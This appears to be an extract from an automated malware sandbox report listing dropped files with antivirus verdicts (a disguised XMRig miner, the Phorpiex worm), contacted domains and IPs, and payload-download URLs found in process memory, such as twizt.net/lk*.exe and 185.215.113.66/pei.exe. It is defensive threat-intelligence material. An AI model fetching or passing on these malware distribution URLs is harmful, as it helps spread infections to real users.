                          C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp70%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                          C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys5%ReversingLabs
                          C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe76%ReversingLabsWin64.Trojan.Whisperer
                          C:\Windows\sysnldcvmr.exe96%ReversingLabsWin32.Worm.Phorpiex
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          geoplugin.net
                          178.237.33.50
                          truefalse
                            high
                            s-part-0035.t-0009.t-msedge.net
                            13.107.246.63
                            truefalse
                              high
                              twizt.net
                              185.215.113.66
                              truetrue
                                unknown
                                twizthash.net
                                185.215.113.66
                                truefalse
                                  high
                                  www.geoplugin.net
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.geoplugin.net/json.gp?ip=false
                                      http://185.215.113.66/pei.exetrue
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://twizt.net/lk7.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                          http://185.215.113.66/pei.exePPC:f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            http://twizt.net/lk11.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                              http://91.202.233.141/1sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                http://91.202.233.141/2sysnldcvmr.exe, 00000005.00000002.3950944128.000000000233B000.00000004.00000010.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    http://185.215.113.66/4Tsysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-svchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://91.202.233.141/5sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000011.00000003.2049303254.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2018868593.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019333713.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987942495.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858520247.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860337514.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860508758.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2049566480.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988209134.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894564769.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1860862317.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927130291.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1894755177.000001A6A4310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078380857.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1987619608.000001A6A4307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1988235899.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858656380.000001A6A430E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            http://twizt.net/rh.exeBn91171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              http://91.202.233.141/3sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                http://91.202.233.141/4sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  http://twizt.net/lk18.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://twizt.net/rh.exe&m1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://185.215.113.66/4C:sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          http://twizt.net/lk9.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            http://twizt.net/rh.exeLj_1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xssvchost.exe, 00000011.00000003.2078169969.000001A6A437A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      http://twizt.net/rh.exeP0U1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://twizt.net/lk16.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            http://185.215.113.66/tcoin.php?s=%s640832494.exefalse
                                                                                              http://twizt.net/lk2.exehttp://twizt.net/lk3.exehttp://twizt.net/lk4.exehttp://twizt.net/lk5.exehttpsysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                http://185.215.113.66/1oCsysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  http://twizt.net/peinstall.phph34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    http://twizt.net/34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue1svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://185.215.113.66/1~sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          http://twizt.net/lk2.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            http://twizt.net/peinstall.phpO34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              http://schemas.xmlsoap.org/soap/encoding/sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                http://185.215.113.66/3Asysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  http://twizt.net/peinstall.phpZ34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://account.live.com/msangcwamsvchost.exe, 00000011.00000003.1748723319.000001A6A4352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749997399.000001A6A432A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749005384.000001A6A4357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      http://185.215.113.66/1JJC:sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://185.215.113.66/5sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          http://185.215.113.66/4sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://185.215.113.66/2Hsysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://185.215.113.66/3sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.00000000006C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                http://185.215.113.66/2sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachisvchost.exe, 0000000A.00000003.1629040986.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    http://nsis.sf.net/NSIS_ErrorErrorf5TWdT5EAc.exe, 00000000.00000000.1309216886.0000000000408000.00000002.00000001.01000000.00000003.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1366762887.0000000000408000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                      http://twizt.net/lk4.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        http://185.215.113.66/1rsysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          http://twizt.net/peinstall.phpJ34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://185.215.113.66/1sysnldcvmr.exe, 00000005.00000003.1503489308.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504517011.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503974451.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503599612.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503762545.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504110490.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000676000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503639237.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1503849850.00000000006E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000011.00000003.2019424299.000001A6A4374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1927200984.000001A6A4378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1926741816.000001A6A4376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://twizt.net/lk14.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://twizt.net/peinstall.phpG34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    http://nsis.sf.net/NSIS_Errorf5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://185.215.113.66/3C:sysnldcvmr.exe, 00000005.00000002.3949590781.00000000006FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://185.215.113.84/nxmr.exeP78476062.exe, 0000000B.00000002.1777292756.0000000000E30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://twizt.net/peinstall.php%temp%%sf5TWdT5EAc.exe, 00000000.00000003.1366451263.0000000004CF1000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmp, 34D7.exe, 00000003.00000000.1336483986.0000000000252000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://twizt.net/lk6.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fxsvchost.exe, 0000000A.00000002.1704092821.000000000270C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://twizt.net/rh.exe1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602367753.0000000000552000.00000002.00000001.01000000.0000000A.sdmp, 1171111125.exe, 00000008.00000000.1542858096.0000000000552000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                      https://account.live.com/Wizard/Password/Change?id=806014svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://twizt.net/lk12.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://twizt.net/newtpp.exe34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://twizt.net/peinstall.php34D7.exe, 00000003.00000002.1456172857.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://twizt.net/peinstall.phpmp34D7.exe, 00000003.00000002.1456172857.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://185.215.113.84/nxmr.exe78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777292756.0000000000E2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:svchost.exe, 00000011.00000003.1780350418.000001A6A4352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://185.215.113.66/1Asysnldcvmr.exe, 00000005.00000003.1504556387.0000000000687000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://91.202.233.141/896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmptrue
                                                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000011.00000003.1893885080.000001A6A4329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://185.215.113.84/nxmr.exeP0sysnldcvmr.exe, 00000005.00000003.1690649668.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, 78476062.exe, 0000000B.00000002.1777160846.00000000007C2000.00000002.00000001.01000000.0000000C.sdmp, 78476062.exe, 0000000B.00000000.1623646967.00000000007C2000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859818262.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859642379.000001A6A430E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://twizt.net/lk19.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fkernelbasentdllkernel32GetProcessMitigasvchost.exe, 0000000A.00000002.1704642025.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://twizt.net/newtpp.exes34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://twizt.net/lk10.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://Passport.NET/STSsvchost.exe, 00000011.00000003.2076118628.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A4382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://twizt.net/lk8.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://91.202.233.141/2~sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://91.202.233.141/3Ssysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels01svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://185.215.113.66/3$sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://twizt.net/lk1.exeMozilla/5.0sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://twizt.net/lk17.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://91.202.233.141/2ksysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/Issuelssvchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                http://185.215.113.66/896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmptrue
                                                                                                                                                                                                                                  http://185.215.113.84/nxmr.exe($B78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://twizt.net/lk1.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://twizt.net/lk20.exesysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        http://185.215.113.66/pei.exeAf5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          http://twizt.net/rh.exe$1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            2.187.91.108
                                                                                                                                                                                                                                            unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                            58224TCIIRtrue
                                                                                                                                                                                                                                            212.13.170.223
                                                                                                                                                                                                                                            unknownKazakhstan
                                                                                                                                                                                                                                            9198KAZTELECOM-ASKZtrue
                                                                                                                                                                                                                                            92.38.19.10
                                                                                                                                                                                                                                            unknownCzech Republic
                                                                                                                                                                                                                                            41712SATELITTV-ASMDtrue
                                                                                                                                                                                                                                            77.44.198.123
                                                                                                                                                                                                                                            unknownSyrian Arab Republic
                                                                                                                                                                                                                                            29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                                                                                                                                                                                            77.44.150.37
                                                                                                                                                                                                                                            unknownSyrian Arab Republic
                                                                                                                                                                                                                                            29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                                                                                                                                                                                                                            151.232.164.243
                                                                                                                                                                                                                                            unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                            58224TCIIRfalse
                                                                                                                                                                                                                                            91.202.233.141
                                                                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                                                                            9009M247GBtrue
                                                                                                                                                                                                                                            189.173.142.192
                                                                                                                                                                                                                                            unknownMexico
